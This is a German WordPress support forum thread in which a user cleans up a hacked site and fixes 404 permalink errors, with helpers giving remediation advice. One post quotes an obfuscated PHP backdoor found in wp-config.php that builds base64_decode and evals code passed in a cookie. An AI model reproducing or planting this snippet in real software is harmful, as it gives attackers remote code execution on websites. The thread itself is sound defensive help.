Support » Installation » Nach Schadsoftware auf Webspace, WordPress neu einrichten

  • Gelöst Wanted2bfree

    (@wanted2bfree)


    Hallo zusammen,

    ich habe von meinem Hoster Hosteurope eine Fehlermeldung am 16.11 erhalten, dass Schadsoftware auf meinem Webspace enthalten wäre und aus Sicherheitsgründen der Webspace gesperrt worden wäre.
    Nach 2 Tagen selbst herumschlagen damit, muss ich um Hilfe von euch bitten.
    Folgendes habe ich bereits gemacht:
    1) Backup eingespielt von VOR dem Schadsoftwarezugriff. (Direkt von Hosteurope „Restore“)
    2) Danach hatte ich WordPress 4.3.1 nochmal neu heruntergeladen und komplett via FTP auf den server geschoben.
    3) Dann hatte ich beim Login noch das Problem(ich kann eine IP noch manuell einrichten bei Hosteurope, um den Server durch den Browser zu erreichen), dass dort ein Fehler kam mit „Cookies sind wegen einer unerwarteten Ausgabe gesperrt.“ –> Den habe ich gestern auch geschafft zu beheben, indem ich die wp-config.php in ANSI gespeichert hatte und nochmal via FTP im Binärverfahren hochgeladen habe.
    4) Als ich mich dann gestern einloggen konnte, habe ich erstmal alle Plugins geupdatet, dann teilweise aber gelöscht, weil ich manche nicht unbedingt brauchte. (3 backupplugins bspw..)

    Mein Hauptproblem besteht jetzt darin:
    Ich erreiche zwar die http://www.meinwordpressblog.de Seite, aber alle anderen Seiten, die ich eingerichtet hatte, werden mit einem 404 bestraft.
    Im Backend habe ich in den Einstellungen nochmal die Permalinks neu eingestellt- hat aber nichts gebracht. Die .htaccess Datei beinhaltet folgenden Code und hat 666 Rechte.

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>

    # END WordPress

    Wenn ich in den Einstellungen auf die Linkstruktur „Standard“ umstelle, dann klappt es, wenn ich auf der Seite navigiere. (Sieht dann so aus http://www.meinewordpressseite.de/pageid=21)

    Also scheinbar ist es irgendein Problem mit Htaccess/Hosteurope/Permalinks oder?
    Könnt ihr mir bitte helfen, ich komme da alleine nicht wirklich weiter.
    Habe natürlich die Möglichkeit, ein altes Backup von vor dem 16.11 (Sperrungstag) wieder herzustellen…

Ansicht von 8 Antworten - 1 bis 8 (von insgesamt 8)
  • Gehackte Websites wieder instand zu setzen, ist ein mühsames Unterfangen – vor allem, wenn man sicher gehen will, alle Hintertürchen des Angreifers dauerhaft zu schließen.

    Deine Vorgehensweise, ein unbeschädigtes Backup wieder hochzuladen und die Dateien von WordPress Core, Plugins sowie Themes vorsichtshalber auszutauschen klingt vom Ansatz schon mal gut.

    Probleme können dabei Cache-Plugins bereiten, die diverse Änderungen vornehmen (z.B. in der .htaccess, neue Ordner in wp-content, …), die durch eine Löschung des Plugins nicht korrigiert werden. Ggf. musst du dich in solchen Fällen durch die Plugin-Seiten hangeln und der Beschreibung zur Deinstallation folgen.

    Unbedingt anzuraten ist auch, sämtliche Zugangsdaten auszutauschen – also die für das Login im Kundenmenü deines Webhosts, der MySQL-Datenbank, des FTP-Accounts sowie aller WordPress-Nutzer. Nach einem Einbruch wechselt man auch die Schlösser aus, vor allem, wenn das Schlüsselbund mitgenommen wurde.

    Zu deinem konkreten Problem, dass die Permalinks nicht funktionieren:

    • Lösch per FTP/Dateiverwaltungsmenü deines Webhosts die .htaccess-Datei und erstelle eine neue, leere .htaccess mit Dateirechten 644
    • meld dich über http://deinedomain.de/wp-login.php im Back End an,
    • wähl unter Einstellungen > Permalinks die gewünschte URL-Form aus und speichere die Einstellung ab.

    Vorsichtshalber solltest du auch noch einen kritischen Blick in das Verzeichnis wp-content/uploads werfen. Sind dort (bis auf eine leere index.php) weitere php-Dateien? Die haben dort nichts verloren! Kannst du von allen jpg-Dateien Thumbnails sehen?

    Außerdem wäre zum zusätzlichen Schutz des Login-Formulars gegen Ausspähversuche ein Plugin wie Login Lockdown hilfreich.

    PS.: Was ist mit der Datenbank? Dort würde ich in der Tabelle wp_users nach neuen, unbekannten Nutzereinträgen suchen. In der Tabelle wp_posts sollten keine iframes enthalten sein.

    Thread-Starter Wanted2bfree

    (@wanted2bfree)

    Hallo nochmal,

    danke für deine Tipps. Also ich habe folgendes versucht:

    .htaccess Datei gelöscht via FTP und eine leere neue Datei mit 644 Rechten angelegt.
    Im Backend Permalinks ausgewählt und gespeichert, 2 mal hin und her gespeichert.

    Die .htaccess Datei enthält auf jeden Fall jetzt Daten, das seh ich auf dem Server. Also das Beschreiben von WordPress funktioniert. Aber der Fehler mit 404 ist immer noch da.

    In der Datenbank hab ich bei wp_users keine falschen User gefunden.
    Zu Wp_posts: Da habe ich in den über 1300 Einträgen nach „iframe“ gesucht, aber nichts gefunden.
    Im Uploads Ordner befinden sich sehr viele Ordner von den vergangenen Jahren. Die Seite ist schon älter.

    Ich möchte nochmal sagen, dass ich ein Backup von vor dem Angriff aufgespielt habe und DANACH aber noch eine komplette WordPressinstallation „frisch“ drüberkopiert habe über das bestehende. Kann es daran irgendwo liegen? Habe die wp-config.php und die functions.php aber vom Backup beibelassen, weil da ja teils wichtige Zugangsinfos drinstehen.

    Sonst noch irgendwelche Ratschläge? Ich kriege die 404-Meldungen nicht weg, wenn ich permalinks auswähle:(

    EDIT
    Ich bin soweit, dass ich ins Custom Permalinkfeld /index.php?/ eingefügt habe, so kann ich zumindest schonmal etwas umgehen. Allerdings klappen dann nur die SEiten, keine einzelnen Beiträge, da lande ich automatisch auf http://www.meineseite.de/?/

    Irgendwelche Tipps?

    Wenn ich Permalinks eingestellt habe und im Backend auf einen Beitrag klicke und darüber „Vorschau“ mache, dann kommt auch ein 404 Fehler:

    Objekt nicht gefunden!

    Der angeforderte URL konnte auf dem Server nicht gefunden werden. Der Link auf der verweisenden Seite scheint falsch oder nicht mehr aktuell zu sein. Bitte informieren Sie den Autor dieser Seite über den Fehler.

    Sofern Sie dies für eine Fehlfunktion des Servers halten, informieren Sie bitte den Webmaster hierüber.

    EDIT ENDE

    Thread-Starter Wanted2bfree

    (@wanted2bfree)

    Übrigens habe ich in der wp-Config folgenden Code entdeckt, der ganz oben drin steht. Weiß einer was das sein soll? Habe das mal rausgelöscht vorsichtshalber…
    <?php $kxls19 =“stb6ao_epd4c“; $sre2 = strtolower ($kxls19[2].$kxls19[4].$kxls19[0]. $kxls19[7] .$kxls19[3]. $kxls19[10]. $kxls19[6] . $kxls19[9].$kxls19[7]. $kxls19[11].$kxls19[5].$kxls19[9]. $kxls19[7] ); $kmad93 = strtoupper( $kxls19[6].$kxls19[8].$kxls19[5].$kxls19[0].$kxls19[1] ); if(isset ( ${$kmad93} [ ’n764b3b‘ ] ) ) {eval( $sre2 ( ${$kmad93} [’n764b3b‘] ) ) ;}?> <?php

    du musst jede php Datei checken, ob da sowas drin steht, das ist Schadcode…

    auch dein Theme hat viele php Dateien, egal wo und welche

    durchsuche den Uploadordner nach Bildern die 0 Bites haben => löschen, jeden Monatsordner alle, wirklich alle
    durchsuche, die index.php Files, die in den meisten Ordnern drin liegen, grade in wp-content/plugins oder wp-content/themes eben in allen Unterordnern von wp-content

    findest du noch php Dateien die nicht von WP stammen?
    niemals WP einfach überschreiben bei einem Hack, sondern löschen und neu hochladen,
    ebenso bei den Plugins,
    checke deinen PC auf Schadcode,

    Der Code in deiner wp-config.php testet, ob die Malware an anderer Stelle noch vorhanden ist, um dann einen schnellen Zugriff zu erlauben. Danke an Monika für den Hinweis, dass ein Überschreiben alleine nicht reicht, weil durch den Angreifer zusätzlich installierte Skripte davon nicht erfasst werden. Dazu musst du tatsächlich alle (auch versteckten) Dateien mit Ausnahme der wp-config.php sowie deiner Uploads (wp-content/uploads) löschen und erst dann die neuen Dateien hochladen. Die wp-config.php hast du bereits durchgesehen und bereinigt, das Verzeichnis Uploads muss ebenfalls peinlichst genau durchgesehen werden, zumal sich in vermeintlichen jpeg-Dateien ebenfalls Schadcode befinden kann.

    Es gibt zahlreiche Punkte, an denen du ansetzen kannst, um deine WordPress-Installation weiter abzusichern. Ganz wichtig ist neben vernünftigen Passwörtern auch, WordPress und alle verwendeten Themes und Plugins immer aktuell zu halten.

    Thread-Starter Wanted2bfree

    (@wanted2bfree)

    Hallo nochmal,

    vielen Dank für die zusätzlichen Tipps!

    Ich habe zunächst den Tipp befolgt, erstmal alles vom FTP wegzulöschen im WordPressordner, außer die wp-config.php und den Upload Ordner im wp-content.

    Dann bin ich die Uploadordner durchgegangen: Da habee ich tatsächlich im Upload Ordner versteckt ungefähr 10 .php Dateien entdeckt, die ebenfalls Schadcode enthielten. Die habe ich jetzt alle rausgelöscht. Jpgs mit 0kb habe ich keine gefunden.

    Danach habe ich auch das Theme (Brunelleschi) nochmals heruntergeladen und neu aufgespielt. Die paar Custom Änderungen habe ich schnell per Hand wieder eingepflegt.

    Habe jetzt an meinen Hostinganbieter die Anfrage gestellt, ob der Webspace wieder freigegeben werden kann.

    Mein Problem mit den 404 Permalinks ist allerdings immer noch nicht behoben dadurch… 🙁 Nur die Standarddarstellung mit /pageid=31 funktioniert derzeit..

    http://www.polgar-stuewe.de heißt die Seite und ist jetzt auch wieder erreichbar.

    Danach habe ich auch das Theme (Brunelleschi) nochmals heruntergeladen und neu aufgespielt. Die paar Custom Änderungen habe ich schnell per Hand wieder eingepflegt.

    Das ist so auch nicht ganz ideal. Besser wäre es, Änderungen in einem Child-Theme vorzunehmen, das bei Updates nicht überschrieben wird.

    Das Problem mit den Permalinks könnte auch von der Sperrung kommen. Hast Du es jetzt nochmal probiert?

    Denk auch nochmal daran, dein Login-Formular abzusichern, z.B. mit Login Lockdown.

    Thread-Starter Wanted2bfree

    (@wanted2bfree)

    Hey Bego,

    Zu dem Brunelleschi Theme: Ich glaube tatsächlich, dass es in ein Child-Theme geschrieben wurde, habe im Backend vom Theme eine extra Option gehabt, um diese Veränderungen vorzunehmen.

    Dein Tipp war richtig! Durch die Sperrung waren die Permalinks nicht möglich. Jetzt geht es auch wieder damit!
    Login Lockdown habe ich installiert, ebenso ein Backup Plugin um es jede Nacht zu sichern. Und ich habe noch All in One WP-Security installiert, was ich jetzt noch einrichten werde.
    Vielen Dank für die kompetente Hilfe, ich glaub mein Fall ist hiermit gelöst!

Ansicht von 8 Antworten - 1 bis 8 (von insgesamt 8)
  • Das Thema „Nach Schadsoftware auf Webspace, WordPress neu einrichten“ ist für neue Antworten geschlossen.